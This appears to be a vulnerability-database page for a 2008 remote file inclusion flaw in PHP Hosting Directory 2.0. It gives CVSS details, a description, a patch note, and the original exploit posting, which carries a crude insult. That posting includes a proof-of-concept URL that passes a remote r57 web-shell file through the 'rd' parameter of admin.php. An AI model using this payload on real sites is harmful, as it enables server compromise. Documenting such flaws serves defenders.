header-logo
Suggest Exploit
vendor:
PHP Hosting Directory
by:
RoMaNcYxHaCkEr
8.8
CVSS
HIGH
RFI
98
CWE
Product Name: PHP Hosting Directory
Affected Version From: 2
Affected Version To: 2
Patch Exists: YES
Related CWE: N/A
CPE: a:jnshosts:php_hosting_directory
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

PHP Hosting Directory 2.0

A remote file inclusion vulnerability exists in PHP Hosting Directory 2.0, which allows an attacker to include a remote file via the 'rd' parameter in the 'admin.php' script. This can be exploited to execute arbitrary PHP code by including a malicious file from a remote location.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version.
Source

Exploit-DB raw data:

# Name Of Script : PHP Hosting Directory 2.0 
# Download From : http://jnshosts.com/download/phphost_directory.zip
# Found By : RoMaNcYxHaCkEr
# My Homepage : WwW.4RxH.CoM
# My Group : [RoMaNTiC-TeaM]
# Type Of Exploit : RFI
# P.O.C. : http://WwW.4RxH.CoM/phphost_directoryv2/include/admin.php?rd=http://site.com/r57.txt?
# Good Luck
# Note : If You Lamerz , Kidz Or Snitch Just I Said For You (Fuck You)
# Contact Me : RxH0@HoTMaiL.CoM
# rXh
# bEST wISHES

# milw0rm.com [2008-07-29]

Navigation

Suggest Exploit

Services By CQR